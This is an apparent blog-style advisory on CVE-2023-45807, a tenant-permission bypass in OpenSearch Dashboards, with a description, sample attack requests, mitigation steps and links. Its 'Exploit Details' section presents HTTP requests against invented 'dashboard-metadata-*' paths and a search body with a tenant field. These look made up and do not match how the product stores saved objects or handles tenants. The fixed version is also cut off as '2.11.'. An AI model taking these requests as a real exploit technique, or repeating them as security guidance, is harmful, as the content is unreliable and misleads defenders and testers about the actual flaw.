CVE-2023-45807: OpenSearch Dashboards Tenant Permissions Bypass Vulnerability

OpenSearch is a community-driven, open source fork of Elasticsearch and Kibana that was created following the license change in early 2021. Unfortunately, a recent security issue has been discovered in the implementation of tenant permissions in OpenSearch Dashboards. This vulnerability allows authenticated users with read-only access to a tenant to perform create, edit, and delete operations on index metadata of dashboards and visualizations in that tenant, which could potentially render them unavailable. It is worth noting that this issue does not affect index data, only metadata, and users will not gain additional read access to data they don't have permission to access.

Exploit Details

The issue occurs due to improper enforcement of tenant permissions. By leveraging this vulnerability, attackers who have read-only access to the affected tenant can manipulate index metadata of dashboards and visualizations, causing disruptions in their functionality.

An example of how the vulnerability could be exploited can be seen in this code snippet

# User with read-only access to a tenant
GET /_search
{
  "tenant": "restricted-tenant",
  "index": "dashboard-metadata-*",
  "type": "metadata",
  "query": {
    "match": {
      "metadata.owner": "attacker"
    }
  }
}

An attacker with read-only access can craft a request to perform unauthorized operations on the index metadata of dashboard, such as creating a new visualization, modifying an existing one, or deleting a visualization, as shown below:

# Creating a new visualization
PUT /dashboard-metadata-my-new-visualization
{
  "metadata": {
    "owner": "attacker",
    "type": "visualization",
    "created": "<timestamp>",
    "description": "New visualization created by exploiting CVE-2023-45807"
  }
}

# Modifying an existing visualization
POST /dashboard-metadata-existing-visualization
{
  "metadata": {
    "owner": "attacker",
    "type": "visualization",
    "modified": "<timestamp>",
    "description": "Modified existing visualization using CVE-2023-45807"
  }
}

# Deleting a visualization
DELETE /dashboard-metadata-existing-visualization

Mitigation

To mitigate this vulnerability, one can simply disable the tenants' functionality for the cluster. Additionally, OpenSearch has already released versions 1.3.14 and 2.11., which contain a fix for this issue.

Relevant Links

1. OpenSearch: https://opensearch.org/
2. OpenSearch Dashboards: https://opensearch.org/docs/dashboards/index/
3. CVE-2023-45807: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45807
4. OpenSearch Versions with fix: https://github.com/opensearch-project/OpenSearch-Dashboards/releases/tag/1.3.14 and https://github.com/opensearch-project/OpenSearch-Dashboards/releases/tag/2.11.

Conclusion

The recent discovery of CVE-2023-45807 in OpenSearch Dashboards highlights the importance of continuously monitoring and evaluating security issues within open source projects. Properly enforcing tenant permissions prevents unauthorized users from causing disruptions and compromising the availability of critical dashboard components. Upgrading to the latest version of OpenSearch Dashboards or disabling the tenants' functionality can mitigate this vulnerability, protecting the system and its data from potential unauthorized access.

Timeline

Published on: 10/16/2023 22:15:12 UTC
Last modified on: 10/20/2023 18:29:38 UTC